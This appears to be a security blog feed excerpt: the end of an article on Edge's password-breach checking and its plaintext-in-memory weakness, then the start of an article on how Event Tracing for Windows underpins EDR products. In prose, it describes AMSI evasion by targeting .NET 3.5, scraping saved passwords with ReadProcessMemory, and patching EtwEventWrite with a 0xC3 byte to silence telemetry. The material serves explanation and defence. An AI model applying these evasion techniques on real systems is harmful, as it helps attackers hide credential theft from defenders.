No, in the strict cryptographic sense. K-anonymity leaks the bucket index by design -- the server learns a 20-bit (HIBP), 15-bit (Apple), or 16-bit (Edge shard) prefix of the hash being queried, which carries non-trivial information about which password the client is asking about. A proper PSI protocol leaks nothing beyond the intersection itself. The argument for k-anonymity is that the bucket is large enough -- on the order of hundreds to thousands of possible hashes per bucket -- that the residual information is not actionable for the threats most users face. It is a precise statement of &quot;a small leak in exchange for vast practical efficiency&quot;; the cost is documented and bounded, and that is why every deployed service uses some variant of it. But it is not zero-leak.

Threat-model differences and SGX&apos;s well-documented side-channel literature (see the §6 Aside for the four-attack chronology). For a breach-checking service whose threat model is &quot;the corpus must not leak from inside Microsoft,&quot; HE-PSI offers a clean cryptographic argument that does not depend on any TEE&apos;s silicon-level security claims. The MSR Cryptography and Privacy group had been publishing the relevant HE-PSI papers since 2017 and shipping the SEAL library publicly since 2018, so the substrate was in-house. The cost is real (orders of magnitude more compute than an SGX enclave) but tractable at the sharded scale Edge Password Monitor operates at. The trade is reasonable, and it is documented in the MSR blog [@msr-password-monitor-2021].

AMSI evasion. The Antimalware Scan Interface scans .NET 4.8+ assemblies before execution; .NET 3.5 predates AMSI&apos;s API surface entirely. A C# program targeting .NET 3.5 will run on any modern Windows with the legacy framework installed (which is most of them, because .NET 3.5 is shipped as a Windows feature) and will not be subject to the same managed-runtime scanning that 4.8+ assemblies are. The current GitHub README says &quot;.NET Framework 4.8.1 (changed from 3.5 originally)&quot; [@ronning-github] -- likely to ease running on a clean modern Windows -- but the original .NET 3.5 framing was the deliberate AMSI-evasion choice. The sibling AMSI post in this series explains the scanning architecture in detail.

Per the researcher&apos;s claim and the PCWorld relay, no -- see §7 for the decrypt-on-autofill contrast and Chrome&apos;s App-Bound Encryption hardening [@pcworld-pippig-2026][@google-chrome-abe-2024]. The observable difference is direct: a `ReadProcessMemory`-based scrape of an idle Chrome process returns markedly less than the same scrape of an idle Edge process.

Yes (with caveats). See §7&apos;s MSRC-servicing-criteria Aside for the full framing [@msrc-servicing-criteria]: the short answer is that the position is internally consistent with a decade of MSRC policy and with the §9 architectural lower bound, but it concedes the same-user LCE threat model and shifts defence onto endpoint controls (antivirus, application-control policies, PPL on antimalware processes only) that may not exist on the user&apos;s machine. The architectural primitive that would close the gap (an OS broker) exists on Windows but is not wired into Chromium.
&lt;p&gt;The PSI on the wire is real. The plaintext-RAM concession is also real. Both are statements about which threat model the Edge product team is defending against, and the apparent contradiction in the title disappears once you read them as such.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;edges-two-password-cryptographies&quot; keyTerms={[
  { term: &quot;Private Set Intersection (PSI)&quot;, definition: &quot;A two-party cryptographic protocol that computes the intersection of two sets without revealing anything else.&quot; },
  { term: &quot;Oblivious Transfer (OT)&quot;, definition: &quot;A primitive in which a sender holds two messages, a receiver picks one, and neither learns the other&apos;s choice or the unsent message.&quot; },
  { term: &quot;OT extension&quot;, definition: &quot;Two-phase protocol that turns kappa public-key OTs into m symmetric-cost OTs, collapsing per-OT cost by orders of magnitude.&quot; },
  { term: &quot;Oblivious Pseudorandom Function (OPRF)&quot;, definition: &quot;Two-party protocol where the receiver learns F_k(x) without revealing x to the sender or learning k.&quot; },
  { term: &quot;Pseudorandom Correlation Generator (PCG)&quot;, definition: &quot;Primitive that locally expands a short shared seed into long correlated random strings, used to make Silent OT communication-free post-seed.&quot; },
  { term: &quot;Homomorphic encryption (HE / SWHE / FHE)&quot;, definition: &quot;Encryption supporting operations on ciphertexts that decrypt to operations on plaintexts; SWHE is bounded depth, FHE is unbounded via bootstrapping.&quot; },
  { term: &quot;Cuckoo hashing&quot;, definition: &quot;Hashing with k candidate bins per element and displacement, achieving O(1) lookup at high load -- the partitioning trick under CLR17 and CHLR18.&quot; },
  { term: &quot;k-anonymity (password monitoring)&quot;, definition: &quot;A precise small information leak: each query is consistent with at least k possible passwords sharing the bucket prefix.&quot; },
  { term: &quot;Data Protection API (DPAPI)&quot;, definition: &quot;Windows facility that wraps blobs under user-derived keys; an at-rest control, not an in-process-memory control.&quot; },
  { term: &quot;App-Bound Encryption (Chrome, July 2024)&quot;, definition: &quot;Chrome control that binds DPAPI unwrap of saved data to the verified Chrome process identity, blocking same-user impersonation attacks.&quot; }
]} questions={[
  { q: &quot;Why does the DH meet-in-the-middle PSI protocol fail at breach-checking scale?&quot;, a: &quot;It costs O(|S_B|) group exponentiations per query, leaks set cardinality on both sides, and provides no labeled-PSI variant.&quot; },
  { q: &quot;What three engineering moves let CLR17 revive FNP04&apos;s polynomial-roots PSI?&quot;, a: &quot;(1) BFV SWHE replaces Paillier for slot-packed homomorphic evaluation, (2) Cuckoo hash partitioning splits the giant polynomial into per-bin polynomials, (3) partition-and-evaluate bounds server work to O(|S_S| log |S_R|).&quot; },
  { q: &quot;What does the OPRF preprocessing layer add to Edge Password Monitor&apos;s bare HE-PSI?&quot;, a: &quot;It prevents a malicious client from brute-forcing the server&apos;s corpus offline; the client cannot evaluate F_k(x) without server interaction.&quot; },
  { q: &quot;What does the EdgeSavedPasswordsDumper PoC require to read Edge passwords as cleartext?&quot;, a: &quot;Same-user OpenProcess + ReadProcessMemory on the parent msedge.exe. No kernel exploit, no admin (against same-user processes), no DPAPI bypass.&quot; },
  { q: &quot;Why is &apos;no cryptographic primitive closes the plaintext-RAM gap&apos; the structural claim of section 9?&quot;, a: &quot;Using a plaintext value requires holding it; the only escape hatch is moving the holder to a higher-privileged broker process, which is an architectural choice, not a cryptographic one.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>private-set-intersection</category><category>homomorphic-encryption</category><category>microsoft-edge</category><category>password-security</category><category>threat-modeling</category><category>dpapi</category><category>cryptography</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>ETW: How Windows 2000&apos;s Performance Hack Became the EDR Substrate</title><link>https://paragmali.com/blog/etw-how-windows-2000s-performance-hack-became-the-edr-substr/</link><guid isPermaLink="true">https://paragmali.com/blog/etw-how-windows-2000s-performance-hack-became-the-edr-substr/</guid><description>Event Tracing for Windows is the kernel-buffered observability bus every modern Windows EDR consumes. This is the architecture, the attacks, and the one provider that survives them.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><content:encoded>
Event Tracing for Windows is the high-rate, kernel-buffered observability bus that every modern Windows EDR consumes. A 2007-era architectural decision -- letting eight sessions read the same provider concurrently -- is what makes multi-vendor coexistence possible on a single host. Microsoft&apos;s `Microsoft-Windows-Threat-Intelligence` provider, gated behind Protected Process Light and an ELAM-signed Antimalware certificate since the Windows 10 RS-era, fires from the kernel side of memory-modifying syscalls and survives the user-mode `EtwEventWrite` patch class that defined red-team tradecraft from 2020 to 2022. The remaining attack surface -- BYOVD-driven kernel tampering -- is structurally narrowed by the Vulnerable Driver Blocklist enabled by default since Windows 11 22H2, with the residual sub-microsecond-payload gap remaining as ETW&apos;s irreducible &quot;observation, not enforcement&quot; limit.
&lt;h2&gt;1. Why didn&apos;t the patch silence Defender?&lt;/h2&gt;
&lt;p&gt;A red-team operator drops onto a 2026 Defender [@paragmali-com-war-it]-protected box and runs the move that worked five years ago. They locate &lt;code&gt;ntdll!EtwEventWrite&lt;/code&gt; in the calling process, write the byte &lt;code&gt;0xC3&lt;/code&gt; over the function prologue, and the calling process now silently fails to emit user-mode ETW events. The .NET CLR provider goes dark. &lt;code&gt;Invoke-Mimikatz&lt;/code&gt; loads from &lt;code&gt;execute-assembly&lt;/code&gt; without lighting up &lt;code&gt;Microsoft-Windows-DotNETRuntime&lt;/code&gt;. Defender catches the credential dump [@paragmali-com-and-the] anyway, four seconds later, and the operator is on a SOC analyst&apos;s screen before the shellcode finishes running.&lt;/p&gt;
&lt;p&gt;The patch worked. The .NET tracing provider in that process is mute. Attach a debugger and disassemble the function prologue: the first byte is now &lt;code&gt;0xC3&lt;/code&gt;, the near-return opcode [@felixcloutier-ret] [@felixcloutier-ret], and any caller falls straight back to its return address before producing a single event. The technique is the one Adam Chester documented in March 2020 [@xpn-hiding-dotnet] [@xpn-hiding-dotnet], and to a generation of red teamers it has functioned as a near-universal ETW evasion ever since.&lt;/p&gt;
&lt;p&gt;So why did Defender still fire?&lt;/p&gt;
&lt;p&gt;Because Defender does not consume &lt;code&gt;Microsoft-Windows-DotNETRuntime&lt;/code&gt; to detect a credential dump. It consumes &lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt; [@fluxsec-eti] [@fluxsec-eti] -- a provider whose GUID is &lt;code&gt;{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}&lt;/code&gt;, whose events fire from inside the kernel side of memory-modifying syscalls, and whose producer the user-mode patcher cannot reach. The patch operated on a &lt;code&gt;ntdll&lt;/code&gt; trampoline. The signal Defender used was emitted from a different layer entirely.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Modern Windows EDR is layered on ETW, and the layers fail under different attacks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That single asymmetry -- one provider goes dark to a one-byte patch, another fires from a place the patcher cannot touch -- is the spine of this article. Around it sits a 26-year story of one Microsoft team accidentally building the substrate of every modern Windows endpoint security product.&lt;/p&gt;

A high-rate, kernel-buffered tracing facility built into Windows since 2000. Components called *providers* emit events tagged with a GUID; *controllers* configure trace sessions; *consumers* subscribe to live event streams or read recorded `.etl` files. ETW was designed for low-overhead developer diagnostics; it was retrofitted into the security-telemetry substrate that all modern Windows EDR products consume.

A class of endpoint security product that ingests behavioural telemetry (process creation, image load, memory allocation, network connection, registry change), correlates it against detection logic, and produces alerts and response actions. On Windows, the dominant EDRs (Microsoft Defender for Endpoint, CrowdStrike Falcon, SentinelOne, Elastic Defend, Wazuh, Sysmon-plus-SIEM) all build on ETW or on the same kernel callbacks ETW exposes to the user-mode tier.
&lt;p&gt;To understand why a one-byte patch silences one provider but not another, we have to go back to a Windows 2000 design decision about per-CPU ring buffers.&lt;/p&gt;
&lt;h2&gt;2. ETW in Windows 2000: the performance problem that started it all&lt;/h2&gt;
&lt;p&gt;Imagine a 1999 network-driver author. A customer&apos;s NT4 production server is corrupting packets under load and the only available instrumentation is &lt;code&gt;DbgPrint&lt;/code&gt;. Each call serialises through a kernel debug port, costs measurable percentage points of CPU on a busy box, and ships data to whoever happens to have the kernel debugger attached. The customer says no. The bug reproduces only at production traffic levels. You cannot ship enough printf-debugging through a debug port to find it.&lt;/p&gt;
&lt;p&gt;That is the engineering pain Insung Park and Ricky Buch&apos;s team was solving when ETW shipped with Windows 2000. Their design moves -- recorded years later in the definitive April 2007 MSDN Magazine article on the Vista upgrade [@ms-park-buch-2007] [@ms-park-buch-2007] -- still define the architecture two and a half decades later.&lt;/p&gt;
&lt;p&gt;The first move was per-CPU ring buffers. A producer on CPU 7 writes to CPU 7&apos;s buffer with no lock contention against producers on other CPUs. Hot-path tracing on a 64-core machine does not serialise. The kernel allocates at least two buffers per logical processor [@ms-event-trace-props] [@ms-event-trace-props] so a producer can keep writing while a writer thread drains the previous buffer.&lt;/p&gt;
&lt;p&gt;The second move was an asynchronous writer thread. The producer never blocks on disk I/O. It writes to its CPU&apos;s buffer and returns. A separate kernel thread drains buffers to file or hands them to a real-time consumer. ETW pushes the latency tax onto the consumer and the storage path, never onto the producer&apos;s hot loop.&lt;/p&gt;
&lt;p&gt;The third move was dynamic enable and disable. Park and Buch describe the resulting capability in one sentence:&lt;/p&gt;

ETW gives you the ability to enable and disable logging dynamically, making it easy to perform detailed tracing in production environments without requiring reboots or application restarts. -- Park &amp;amp; Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]
&lt;p&gt;That sentence is the entire reason ETW could later become the EDR substrate. A producer compiles its trace points into shipping code at low cost; a controller flips them on at runtime when somebody actually wants the data. Without that property, you cannot build a security product that ships universal kernel tracing on a billion endpoints.&lt;/p&gt;
&lt;p&gt;The fourth move was the trichotomy of providers, controllers, and consumers [@ms-etw-wdk] [@ms-etw-wdk]. Microsoft did not write ETW as an internal-only facility. From the start, third parties could write providers (driver authors instrumenting their own code), controllers (performance tools starting and stopping sessions), and consumers (analyzers reading event streams). The architecture is open by design.&lt;/p&gt;

A component that emits ETW events, identified by a GUID. A provider is registered with the system at runtime via the `EventRegister` API (or its predecessor `RegisterTraceGuids` for classic providers) and emits events via `EventWrite` (or `TraceEvent`). Providers ship inside Windows itself, inside Microsoft applications, and inside any third-party binary that wants to expose tracing.

A component that creates, configures, enables, and stops trace sessions. Controllers select which providers a session subscribes to and at which level and keyword bitmask. The Windows Performance Recorder, `logman`, `xperf`, and every EDR&apos;s session-management code are controllers.

A component that reads events from a session in real time or from an `.etl` file on disk. Consumers register a callback that the system invokes once per delivered event. The Windows Performance Analyzer, the krabsetw library, SilkETW, and every EDR&apos;s sensor process are consumers.

flowchart LR
    Ctl[Controller&lt;br /&gt;StartTrace + EnableTrace] --&amp;gt; Sess[Trace Session&lt;br /&gt;per-session buffer pool]
    P1[Provider on CPU 0] --&amp;gt; CPU0[CPU 0 buffer]
    P2[Provider on CPU 1] --&amp;gt; CPU1[CPU 1 buffer]
    P3[Provider on CPU N] --&amp;gt; CPUN[CPU N buffer]
    CPU0 --&amp;gt; WT[Writer thread&lt;br /&gt;asynchronous drain]
    CPU1 --&amp;gt; WT
    CPUN --&amp;gt; WT
    Sess -.governs.-&amp;gt; CPU0
    Sess -.governs.-&amp;gt; CPU1
    Sess -.governs.-&amp;gt; CPUN
    WT --&amp;gt; File[(.etl file)]
    WT --&amp;gt; RT[Real-time consumer&lt;br /&gt;OpenTrace + ProcessTrace]
&lt;p&gt;The original Windows 2000 implementation supported 32 trace sessions running simultaneously [@ms-etw-sessions] [@ms-etw-sessions], a number Microsoft later raised to 64 globally. ETW was framed as a developer-diagnostics facility -- the Windows Driver Kit primary still describes it that way [@ms-etw-wdk] [@ms-etw-wdk] -- and the security-telemetry use case did not exist for almost a decade.&lt;/p&gt;
&lt;p&gt;But the design choices that made ETW good for low-overhead production diagnostics turn out to be exactly the design choices a security telemetry bus needs. Per-CPU buffers solve the multi-core throughput problem. Asynchronous writes solve the producer-latency problem. Dynamic enable solves the always-shipping-but-mostly-off problem. The trichotomy solves the third-party-extensibility problem. Twenty-five years later, every modern Windows EDR consumes telemetry through the same four primitives.Windows 2000&apos;s 32-session global cap [@ms-etw-sessions] is preserved verbatim on the modern Microsoft Learn page: &quot;Windows 2000: Supports only 32 event tracing sessions.&quot; The cap doubled to 64 in later releases and has stayed there ever since.&lt;/p&gt;
&lt;p&gt;The 2000-era design carried one limit, however, that turned out to matter for security: only one trace session could enable a classic provider at a time. The next ten years would be defined by the consequences.&lt;/p&gt;
&lt;h2&gt;3. The MOF era: one session, one steal, one decade of coexistence pain&lt;/h2&gt;
&lt;p&gt;In 2005, a third-party performance monitor that registered a classic provider could find itself silently disabled the moment Microsoft&apos;s &lt;code&gt;wprui.exe&lt;/code&gt; started its own session against the same provider GUID. The first session got no error. It just stopped receiving events. That second-consumer-steals-first behavior is the architectural fact of the entire 2000-2007 era.&lt;/p&gt;
&lt;p&gt;Microsoft Learn still documents the rule in one sentence:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &quot;Up to eight trace sessions can enable and receive events from the same manifest-based provider. However, only one trace session can enable a classic provider. If more than one trace session tries to enable a classic provider, the first session would stop receiving events when the second session enables the provider.&quot; -- Microsoft Learn, Configuring and Starting an Event Tracing Session [@ms-etw-config] [@ms-etw-config]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That single rule made multi-EDR coexistence on classic providers structurally impossible. If Defender&apos;s predecessor and a third-party HIPS both wanted real-time process events from the same classic provider, they had to fight for it. The loser got silence with no notification.&lt;/p&gt;
&lt;p&gt;The provider class involved was &lt;em&gt;MOF-based&lt;/em&gt;, named after the schema language that described its events.&lt;/p&gt;

The schema description language inherited from WBEM (Web-Based Enterprise Management). For ETW, MOF files describe each event a classic provider can emit -- field names, types, tasks, opcodes -- and are compiled into the WMI repository at install time using `mofcomp`. Consumers decode events by querying the WMI repository for the matching MOF schema.

A synonym for *MOF provider*. The original ETW provider class introduced in Windows 2000. Registered with `RegisterTraceGuids`, emits events via `TraceEvent`, decoded against a MOF schema in the WMI repository. Capped at one trace session per provider.
&lt;p&gt;The MOF model was workable for a single-consumer world. A performance-tuning team running an in-house tool could enable the provider, capture, and disable. As the substrate of a security stack with multiple agents on the same host, it could not work. The mid-2000s had not yet produced a &quot;multiple agents on the same host&quot; world, so the limit did not bite immediately. By 2007 it would.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Class&lt;/th&gt;
&lt;th&gt;Era&lt;/th&gt;
&lt;th&gt;Schema location&lt;/th&gt;
&lt;th&gt;Sessions/provider&lt;/th&gt;
&lt;th&gt;Adoption in 2026&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;MOF / classic&lt;/td&gt;
&lt;td&gt;2000&lt;/td&gt;
&lt;td&gt;WMI repository&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Niche; mostly NT Kernel Logger&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WPP&lt;/td&gt;
&lt;td&gt;2002&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.pdb&lt;/code&gt; (TMF)&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Pervasive inside Windows internals&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Manifest-based&lt;/td&gt;
&lt;td&gt;2007 (Vista)&lt;/td&gt;
&lt;td&gt;XML manifest&lt;/td&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Dominant for security telemetry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TraceLogging&lt;/td&gt;
&lt;td&gt;2015 (Win10)&lt;/td&gt;
&lt;td&gt;Inline (TLV)&lt;/td&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Rising for new app/service code&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;A handful of classic providers survived the 2007 transition and are still significant. The most important is the NT Kernel Logger [@ms-etw-sessions] [@ms-etw-sessions], the special-purpose system session that captures high-throughput kernel events: file I/O, disk I/O, registry operations, network packets. On most consumer SKUs it remains the only path to those event streams at line rate. Sysmon and most kernel-level diagnostics tools use the NT Kernel Logger or its modern descendants.The NT Kernel Logger is a system reserved logger. There is exactly one of it on a host, and the kernel itself owns the buffers. Tools that want kernel disk, file, registry, or network events at high throughput typically subscribe through it rather than through manifest providers. This is why a host can have eight &lt;code&gt;Microsoft-Windows-Kernel-File&lt;/code&gt; consumers but cannot easily have two simultaneous full-fidelity disk I/O traces.&lt;/p&gt;
&lt;p&gt;By 2007 Microsoft knew the one-session limit had to go. The fix shipped with Windows Vista in January 2007, and it was the central architectural decision of the entire ETW-as-EDR-substrate story.&lt;/p&gt;
&lt;h2&gt;4. Vista&apos;s eight sessions: the architectural decision that made the modern EDR endpoint possible&lt;/h2&gt;
&lt;p&gt;Park and Buch open their April 2007 MSDN Magazine article with the line that frames every later development:&lt;/p&gt;

On Windows Vista, ETW has gone through a major upgrade, and one of the most significant changes is the introduction of the unified event provider model and APIs. -- Park &amp;amp; Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]
&lt;p&gt;The new model raised the per-provider session cap from one to eight. That single number is why Defender, CrowdStrike Falcon, SentinelOne, Sysmon, and a researcher&apos;s SilkETW tap can all read &lt;code&gt;Microsoft-Windows-Kernel-Process&lt;/code&gt; [@fireeye-silketw-launch] [@fireeye-silketw-launch] from the same host today without one of them stealing events from the others.&lt;/p&gt;
&lt;p&gt;The Vista model also unified two things that had been separate. ETW providers wrote to per-CPU ring buffers; the Win32 Event Log was a different facility with its own writer, its own format, and its own consumers. Park and Buch describe the unification verbatim:&lt;/p&gt;

The new unified APIs combine logging traces and writing to the Event Viewer into one consistent, easy-to-use mechanism for event providers. -- Park &amp;amp; Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]
&lt;p&gt;After Vista, a single &lt;code&gt;EventWrite&lt;/code&gt; call from a manifest-based provider lands both in the per-CPU ring buffer for ETW consumers &lt;em&gt;and&lt;/em&gt; in the &lt;code&gt;evtx&lt;/code&gt; channel for &lt;code&gt;wevtutil&lt;/code&gt; and Group Policy audit consumers, depending on how the manifest&apos;s channel mappings are configured. The &quot;Event Viewer&quot; the user sees is now a consumer of ETW.&lt;/p&gt;

The Vista-era ETW provider class. The provider author writes an XML manifest enumerating events, fields, tasks, opcodes, levels, keywords, and channels. The `mc.exe` message compiler turns the manifest into a binary resource embedded in the provider binary; `wevtutil im` registers the manifest with the system at install time. At runtime the provider calls `EventRegister` once per provider GUID and `EventWrite` per event. Capped at eight trace sessions per provider.

A logical destination for an event, declared in a manifest. The four standard channels are *Admin* (operational events for administrators), *Operational* (verbose events for operators), *Analytic* (high-volume events for diagnostics), and *Debug* (developer-only events). When the provider&apos;s `EventWrite` fires, the kernel demultiplexes by channel: events with channels enabled in the `evtx` configuration land in the corresponding channel log, while subscribed real-time consumers receive them through their session.
&lt;p&gt;The deployment pipeline for a manifest-based provider is heavier than for a classic provider. The author writes a manifest, compiles it, embeds the resource, and runs &lt;code&gt;wevtutil im&lt;/code&gt; at install time. Microsoft Learn calls out the distinction between provider registration and manifest installation [@ms-eventregister] [@ms-eventregister] explicitly, and notes that each process can register up to 1,024 providers [@ms-eventregister] [@ms-eventregister]. In practice few processes come close.&lt;/p&gt;

flowchart TD
    A[Author writes manifest.xml] --&amp;gt; B[mc.exe compiles to binary resource]
    B --&amp;gt; C[Resource embedded in provider .dll/.exe]
    C --&amp;gt; D[Installer runs wevtutil im manifest.xml]
    D --&amp;gt; E[System-wide manifest registry]
    F[Provider process at runtime] --&amp;gt; G[EventRegister GUID]
    G --&amp;gt; H[EventWrite per event]
    H --&amp;gt; I[Per-CPU ring buffer&lt;br /&gt;for ETW sessions]
    H --&amp;gt; J[Channel demux&lt;br /&gt;Admin / Operational / Analytical / Debug]
    J --&amp;gt; K[(.evtx log files)]
    I --&amp;gt; L[Real-time consumers]
    E -.decode metadata.-&amp;gt; L
    E -.decode metadata.-&amp;gt; K
&lt;p&gt;The cap rules now read like this: eight trace sessions can enable a manifest-based provider concurrently [@ms-about-etw] [@ms-about-etw]; up to 64 sessions can run on the system at once [@ms-etw-sessions] [@ms-etw-sessions]; &lt;code&gt;EnableTraceEx2&lt;/code&gt; returns &lt;code&gt;ERROR_NO_SYSTEM_RESOURCES&lt;/code&gt; when the per-provider cap binds [@ms-enabletraceex2] [@ms-enabletraceex2]. The 8-session number was chosen for ergonomics, not for security planning, but it is the load-bearing number in modern Windows endpoint security.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The eight-session cap on manifest-based providers is the single architectural decision that made multi-EDR coexistence on the same Windows host possible. Without it, the second EDR to subscribe to &lt;code&gt;Microsoft-Windows-Kernel-Process&lt;/code&gt; would silently steal events from the first.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A Windows 7-era driver author shipping the inaugural &lt;code&gt;Microsoft-Windows-Kernel-Process&lt;/code&gt; provider, GUID &lt;code&gt;{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}&lt;/code&gt;, authored a manifest declaring &lt;code&gt;ProcessStart&lt;/code&gt; (event ID 1), &lt;code&gt;ProcessStop&lt;/code&gt; (event ID 2), &lt;code&gt;ImageLoad&lt;/code&gt; (event ID 5), and so on. Defender&apos;s &lt;code&gt;MsMpEng.exe&lt;/code&gt; could subscribe; the future CrowdStrike Falcon could subscribe; the future Sysmon could subscribe; the future SilkETW researchers could subscribe. None starves another. The Vista unification is the architectural enabler of the modern multi-EDR Windows endpoint.&lt;/p&gt;
&lt;p&gt;With multi-consumer concurrency solved, the next problems were authoring overhead and producer integrity. Two parallel paths branched off the Vista manifest model: TraceLogging for the first, the EtwTi PPL/ELAM gate for the second.&lt;/p&gt;
&lt;h2&gt;5. Two more provider classes: WPP for the kernel tree, TraceLogging for the app tier&lt;/h2&gt;
&lt;p&gt;Vista&apos;s manifest-based providers solved coexistence and decoding, but they were heavy to deploy. Microsoft shipped two more provider classes -- one older than Vista and one younger -- that traded manifest deployment for two different kinds of simplicity.&lt;/p&gt;
&lt;h3&gt;WPP: the C-preprocessor approach&lt;/h3&gt;
&lt;p&gt;WPP -- Windows software trace PreProcessor -- predates Vista. Community references and the Park &amp;amp; Buch description of ETW being &quot;abstracted into the Windows preprocessor (WPP) software tracing technology&quot; [@ms-park-buch-2007] place its first WDK ship in the Windows XP era; no Microsoft primary pins a specific build. It became the standard tracing facility inside the Windows kernel tree itself for years. The WDK page [@ms-wpp] [@ms-wpp] frames its purpose:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;WPP software tracing supplements and enhances WMI event tracing by adding ways to simplify tracing the operation of the trace provider. It is an efficient mechanism for the trace provider to log real-time binary messages.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A WPP provider is authored in C with macros that look like printf calls. The C preprocessor expands &lt;code&gt;DoTraceMessage(FlagId, &quot;Frobnicating widget %d&quot;, widgetId)&lt;/code&gt; into an &lt;code&gt;EventWrite&lt;/code&gt; call against an auto-generated provider GUID. Format strings are extracted at build time into a &lt;em&gt;Trace Message Format&lt;/em&gt; file embedded in the binary&apos;s &lt;code&gt;.pdb&lt;/code&gt;. The producer cost is the smallest of any ETW provider class: emitting an event is a function call plus a few stores into a buffer. There is no manifest to deploy, no XML to author.&lt;/p&gt;
&lt;p&gt;The corresponding decode cost is the highest. A WPP event arrives at the consumer as a binary payload referencing a TMF identifier. To turn that into a human-readable message the consumer needs the producer&apos;s &lt;code&gt;.pdb&lt;/code&gt; file. If you do not have the symbols for the binary that emitted the event, you do not know what the event means.&lt;/p&gt;
&lt;p&gt;That decode cost is why WPP did not become the EDR substrate. Sealighter&apos;s README puts the operational consequence verbatim:&lt;/p&gt;

A C-preprocessor-based ETW authoring path inherited from the XP-era WDK. Format strings are extracted to a TMF resource that lives in the producer&apos;s `.pdb`. Producer cost is minimal; decode cost requires the producer&apos;s symbol files. WPP providers inherit the classic one-session-per-provider cap and are pervasively used inside Windows itself for in-tree dev-time tracing.
&lt;blockquote&gt;
&lt;p&gt;&quot;WPP traces compounds the issues, providing almost no easy-to-find data about provider and their events.&quot; -- Sealighter README [@gh-sealighter] [@gh-sealighter]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;WPP providers also inherit the classic one-session-per-provider cap [@ms-about-etw] [@ms-about-etw], which would have made them unworkable for multi-EDR consumption even if the decode problem were solved. So WPP became the kernel-tree internal tracing facility -- ubiquitous inside Microsoft&apos;s source tree, irrelevant outside it.&lt;/p&gt;
&lt;h3&gt;TraceLogging: schema in the payload&lt;/h3&gt;
&lt;p&gt;Eight years after Vista, in Windows 10 (2015), Microsoft shipped a parallel path that solved a different problem. TraceLogging [@ms-tracelogging-about] [@ms-tracelogging-about] keeps the eight-session cap of manifest providers but eliminates the manifest deployment burden:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;TraceLogging is a system for logging events that can be decoded without a manifest.&quot; -- Microsoft Learn, About TraceLogging [@ms-tracelogging-about] [@ms-tracelogging-about]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A TraceLogging event carries its own schema inline. The event payload is a sequence of typed-length-value triples: a one-byte type tag, a length, and the data. A consumer that has never seen the provider before can still decode the event because the names and types of every field are &lt;em&gt;in the event&lt;/em&gt;. The provider author needs no XML manifest, no &lt;code&gt;mc.exe&lt;/code&gt;, no &lt;code&gt;wevtutil im&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The trade-off is per-event size. Inline schema strings cost bytes per event. For a high-volume provider emitting millions of events per minute, the per-event size matters and a manifest-based provider is correct. For a new component author who wants tracing without an install-time deployment dance, TraceLogging is the right answer.&lt;/p&gt;

A self-describing ETW provider class shipped in Windows 10. Schema is inline in each event payload as type-length-value triples; consumers decode without a manifest. Available from C/C++ via `TraceLoggingProvider.h`, from .NET via `EventSource` with `EtwSelfDescribingEventFormat`, and from WinRT via `LoggingChannel`. Inherits the eight-session cap from the manifest-based class.
&lt;p&gt;TraceLogging is also the unified path across runtimes. The same self-describing payload format is emitted from native C/C++, from .NET (when an &lt;code&gt;EventSource&lt;/code&gt; opts into &lt;code&gt;EtwSelfDescribingEventFormat&lt;/code&gt;), and from kernel-mode drivers [@ms-tracelogging-portal] [@ms-tracelogging-portal]. A consumer using TDH (the Trace Data Helper API) decodes them without distinguishing between the runtime that emitted them.&lt;/p&gt;
&lt;h3&gt;Four classes, four trade-offs&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Class&lt;/th&gt;
&lt;th&gt;First Shipped&lt;/th&gt;
&lt;th&gt;Schema Location&lt;/th&gt;
&lt;th&gt;Sessions/Provider&lt;/th&gt;
&lt;th&gt;Decode without symbols/manifest?&lt;/th&gt;
&lt;th&gt;Best for&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;MOF / classic&lt;/td&gt;
&lt;td&gt;2000&lt;/td&gt;
&lt;td&gt;WMI repository (&lt;code&gt;mofcomp&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Needs MOF&lt;/td&gt;
